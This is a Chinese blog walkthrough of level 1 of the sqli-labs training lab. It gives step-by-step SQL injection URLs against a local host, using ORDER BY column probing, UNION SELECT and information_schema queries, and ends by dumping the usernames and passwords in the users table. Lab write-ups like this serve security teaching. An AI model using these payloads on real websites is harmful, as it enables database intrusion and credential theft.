首页 > 数据库 >sqli-labs靶场通关攻略

sqli-labs靶场通关攻略

时间:2024-08-15 19:26:10浏览次数:16  
标签:127.0 http --+ Less 0.1 labs sqli 攻略 id

SQL注入

第一关

首先我们进入靶场进入第一关

我们要进行sql注入,先得确定此网站的闭合点

在网址栏后+ /?id=1  回车

判断字段列数 order by

http://127.0.0.1/Less-1/?id=1' order by 1 --+ 页面正常 说明存在1列

http://127.0.0.1/Less-1/?id=1' order by 2 --+ 页面正常 说明存在2列

http://127.0.0.1/Less-1/?id=1' order by 3 --+ 页面正常 说明存在3列

http://127.0.0.1/Less-1/?id=1' order by 4 --+ 页面不正常 说明存在3列

联合查询 查当前数据库名,数据库版本,数据库用户

上面已经查出3列,那么联合查询3列

http://127.0.0.1/Less-1/?id=1' union select 1,2,3 --+ 页面显示的是id=1的数据,没有显示我们联合查询的数据,把人家前面查询的id的数据改成不存在的,比如-1

http://127.0.0.1/Less-1/?id=-1' union select 1,2,3 --+ 此时页面上出现了我们联合查询的回显点

http://127.0.0.1/Less-1/?id=-1' union select 1,database(),user() --+ 联合查询了数据库名和用户

联合查询 查出网站的数据库里面的所有表名

http://127.0.0.1/Less-1/?id=-1'union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+

联合查询 查出users表里面的所有列

http://127.0.0.1/Less-1/?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+

查询表中所有的数据

http://127.0.0.1/Less-1/?id=-1' union select 1,2,group_concat(id,username,password) from users --+

那么在此我们第一关的靶场就打完了(未完待续哦,小编会继续努力提升自己,并为大家带来更多更好的文章哦)。

标签:127.0,http,--+,Less,0.1,labs,sqli,攻略,id
From: https://blog.csdn.net/Nai_zui_jiang/article/details/141200040

相关文章

  • 本地生活服务平台源码在哪里找到?获取全攻略来了!
    随着本地生活的市场前景和收益空间不断显现,各大官方平台的本地生活服务商申请门槛和审核力度以及入局后的考核要求也在持续调高。在此背景下,越来越多的创业者开始想要通过搭建本地生活服务平台源码完成入局,连带着本地生活服务平台源码在哪里找到等相关问题也因此备受关注。而......
  • Flutter项目移动端SQLite升级指南:解决json_extract函数缺失问题
    引言在Flutter移动端项目中依赖于SQLite的高级功能(如json_extract),在低版本的Android系统上部署时,可能会遇到函数不支持的问题。本文将指导你如何通过升级项目中使用的SQLite版本来解决这一问题。前置条件Flutter项目使用sqflite:^2.3.3+1进行SQLite数据库操作。IMBoyA......
  • 短剧CPS系统搭建全攻略:从零到一,详细教程助你快速上手
    目录一、短剧cps是什么?二、短剧cps系统搭建教程1.前端开发2.后端开发4.自动化与持续集成5.数据分析与监控三、部分代码展示 一、短剧cps是什么?短剧CPS系统是一种基于短剧推广的收益分成平台。该系统集成了短剧内容展示、用户观看、付费购买、佣金分成等功能,......
  • 保姆级攻略:企业系统和办公软件上云
    【若您对内容感兴趣,可以联系或关注我们】一、前期准备明确上云目标企业上云的目标多种多样,可能是为了降低成本、提高灵活性、增强安全性,亦或是为了紧跟数字化转型的潮流。明确目标对于后续的规划和决策至关重要。例如,一家小型创业公司由于资金有限,可能主要追求降低IT基础......
  • sqli-labs靶场通关攻略
    一,进入sqli-labs-master靶场第一关,加入参数id.列如:127.0.0.1二.判断SQL注入漏洞--引起报错找到闭合与注释加单引号判断闭合,发现为字符型注入,三.使用orderby判断字段数有几列:3列回显正常,4列出现报错,说明只有3列四.使用unionselect确定回显点五.看到2和3的回显查......
  • 本地生活服务平台源码是什么?成功攻略分享!
    作为当前多家互联网重点布局项目,本地生活已然成为众多创业者心目中理想的创业赛道,本地生活服务商的申请热度更是因此持续飙升。不过,由于各大官方平台对其本地生活服务商的要求日益严苛,让不少创业者在被拒之门外的同时,开始考虑通过本地生活服务平台源码部署这一途径完成入局。......
  • 高效攻略:程序员如何快速上手并精通大模型技术
    探索大模型:职场变革的催化剂在数字化转型的浪潮中,大模型技术正以前所未有的速度改变着职场生态。无论是提升现有服务的智能化程度,还是开辟全新的业务领域,大模型都展现出了无可比拟的优势。对于程序员而言,掌握大模型不仅意味着紧跟技术前沿,更是在职场竞争中占据先机的关键。......
  • 编程入门攻略
    编程小白如何成为大神?大学新生的最佳入门攻略编程已成为当代大学生的必备技能,但面对众多编程语言和学习资源,新生们常常感到迷茫。如何选择适合自己的编程语言?如何制定有效的学习计划?如何避免常见的学习陷阱?让我们一起探讨大学新生入门编程的最佳路径,为你的大学生活和未来职业......
  • Java计算机毕业设计的旅游攻略系统(开题+源码+论文)
    本系统(程序+源码)带文档lw万字以上 文末可获取一份本项目的java源码和数据库参考。系统程序文件列表开题报告内容研究背景随着旅游业的蓬勃发展,人们对于旅行的需求日益多样化与个性化,传统的旅游方式已难以满足现代游客的高效、便捷与深度体验需求。在信息爆炸的时代背景下......
  • pbootcms网站是使用sqlite数据库好还是使用mysql数据库好?
    众多周知pbootcms程序支持sqlite数据库和mysql数据库,目前默认常用最多的是sqlite数据库,有需要转成mysql数据库的可以联系我们。pbootcms数据库sqlite无缝转换mysql数据库 本人从接触pbootcms开始一直都是使用mysql数据库,很少出现被黑和各种不明原因报错。建议有条件的朋友尽量......

赞助商

阅读排行

网站主页关于我们联系我们网站地图

本网站内容转载自其他媒体,侵权联系[admin##ips99.com]。

Copyright © 2020-2023 IPS99 版权所有 IPS99